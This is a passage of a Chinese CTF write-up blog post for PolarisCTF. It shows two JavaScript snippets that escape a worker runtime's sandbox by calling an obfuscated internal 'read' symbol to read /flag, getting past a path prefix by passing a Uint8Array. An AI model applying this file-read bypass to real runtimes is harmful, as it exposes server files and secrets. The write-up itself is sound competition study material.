<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">export</span> <span class="hljs-keyword">default</span> &#123;<br>  <span class="hljs-keyword">async</span> <span class="hljs-title function_">fetch</span>(<span class="hljs-params">request</span>) &#123;<br>    <span class="hljs-keyword">let</span> flag = __runtime.<span class="hljs-property">_internal</span>.<span class="hljs-property">lib</span>.<span class="hljs-property">symbols</span>.<span class="hljs-title function_">_0x72656164</span>(<span class="hljs-string">&#x27;/flag&#x27;</span>);<br>    <span class="hljs-keyword">return</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">Response</span>(<span class="hljs-title class_">JSON</span>.<span class="hljs-title function_">stringify</span>(flag));    <br>  &#125;<br>&#125;<br><br><span class="hljs-comment">//回显</span><br><span class="hljs-comment">//&quot;ERROR: The argument &#x27;path&#x27; must be a string, Uint8Array, or URL without null bytes. Received \&quot;/app/\\u0000\\u0000\\u0000\\u0000\\u0000\&quot;&quot;</span><br></code></pre></td></tr></table></figure>

<p>这里提示我们系统在处理路径会自己加上&#x2F;app&#x2F;，参数可以是string、Uint8Array或URL，我们试试用Uint8Array</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">export</span> <span class="hljs-keyword">default</span> &#123;<br>  <span class="hljs-keyword">async</span> <span class="hljs-title function_">fetch</span>(<span class="hljs-params">request</span>) &#123;<br>  	<span class="hljs-keyword">let</span> encoder = <span class="hljs-keyword">new</span> <span class="hljs-title class_">TextEncoder</span>();<br>	<span class="hljs-keyword">let</span> path = encoder.<span class="hljs-title function_">encode</span>(<span class="hljs-string">&quot;/flag&quot;</span>);<br>    <span class="hljs-keyword">let</span> flag = __runtime.<span class="hljs-property">_internal</span>.<span class="hljs-property">lib</span>.<span class="hljs-property">symbols</span>.<span class="hljs-title function_">_0x72656164</span>(path);<br>    <span class="hljs-keyword">return</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">Response</span>(<span class="hljs-title class_">JSON</span>.<span class="hljs-title function_">stringify</span>(flag));    <br>  &#125;<br>&#125;<br><br><span class="hljs-comment">//回显</span><br><span class="hljs-comment">//xmctf&#123;......&#125;</span><br></code></pre></td></tr></table></figure>

<h2 id="醉里挑灯看剑"><a href="#醉里挑灯看剑" class="headerlink" title="醉里挑灯看剑"></a>醉里挑灯看剑</h2><p>真不会typescript，等学了再来看这个题吧</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>PolarisCTF</div>
      <div>https://www.sunynov.top/2026/04/28/PolarisCTF/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>suny</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2026年4月28日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2026/05/01/ISCC-2026-%E6%A0%A1%E8%B5%9B/" title="ISCC 2026 校赛">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">ISCC 2026 校赛</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2026/04/25/2026FIC%E5%88%9D%E8%B5%9B/" title="2026FIC初赛">
                        <span class="hidden-mobile">2026FIC初赛</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.5.1/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"sg2xM2g9UCt39D62pmfzcl8b-gzGzoHsz","appKey":"ludHhVlixZUIrJv11t6rmegp","path":"window.location.pathname","placeholder":null,"avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":true,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":true},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://icp.gov.moe/?keyword=20250279" target="_blank">萌ICP备20250279号</a> <br> <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
